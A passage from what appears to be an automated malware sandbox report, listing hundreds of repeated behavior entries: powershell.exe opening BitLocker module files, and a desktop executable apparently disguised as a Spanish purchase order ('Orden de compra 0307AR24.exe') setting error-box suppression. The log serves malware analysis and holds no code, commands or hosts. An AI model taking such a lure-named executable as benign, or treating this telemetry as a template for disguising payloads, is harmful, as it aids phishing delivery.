          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
